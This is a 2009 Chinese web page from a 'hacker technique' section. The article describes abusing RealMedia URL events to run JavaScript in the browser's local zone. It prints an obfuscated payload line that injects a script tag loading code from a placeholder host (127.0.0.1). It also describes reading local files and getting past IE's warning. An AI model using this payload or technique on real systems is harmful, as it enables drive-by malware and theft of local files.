当前位置: 首页 > 图文教程 > 网络安全 > 黑客技术 > rm格式插入广告代码

黑客技术
GooJJE.Com谷姐遭国内外黑客狂轰乱炸
中央电视台官方网站被黑2小时 主页被换
博客平台服务WordPress宕机110分钟
谷歌遭受攻击源自中国两校 校方否认攻击
阿迪王官网(adivon.com)被黑客入侵
大学英语四六级考试(CET)官方网站被挂马
黑客提供虚假资料修改百度邮箱导致百度网站被黑
韩日两国网络大战 致使双方服务器不能正常访问
陶然居官网被黑客攻破 提案并不等同于具体实施
西班牙警方破获电脑黑客集团 1270万僵尸网络
数百个Twitter账户被攻击 发送大量减肥产品垃圾信息
网上风传微软官方网站被黑 被证实为不雅内容
解析黑客技术:认识ICMP洪水攻击

黑客技术 中的 rm格式插入广告代码


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-09-13   浏览: 88 ::
收藏到网摘: n/a

很久以前就有这个东西,当时都是用来挂马的,不过忽然想起来,如果能跳到javascript:这样的格式在本地执行js代码意义还是有点的吧,于是测试了下.结果很让人沮丧,realplay对这个好象倒是有限制,而且查看被插入的rm文件里看出应该是本身就做了限制,看来支持的协议不多啊....于是试试file:///,结果发现是支持的,于是想到前段时间的html injection,如果加起来应该有点效果.
复制代码 代码如下:

u 00:00:02 00:00:05 file://C:\WINDOWS\Help\iisHelp\common\400.htm#javascript:document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,47,116,101,115,116,46,106,115,62,60,47,115,99,114,105,112,116,62))/


这段代码插进去会出现一个诡异的连接,点击下会执行我指定的js(微软的工程师还是很小心的,暂时正常情况下找到的html就这一个,而且还要点......),而且事实证明的确是本地域执行的,可以读本地的文件,呵呵......而且在realone播放的情况下,ie那个本地执行js代码的警告居然会神奇地消失,于是放到html页面播放,果然很郁闷,打开任何html都会警告,不过还是神奇地能打开本地域的文件.....正常下用window.open是不可以的.....域的限制是可以突破,希望能找到个本地存在问题的html就OK啦,呵呵.......
真希望这些边缘的地方能出点问题,我感觉还是可能的 :)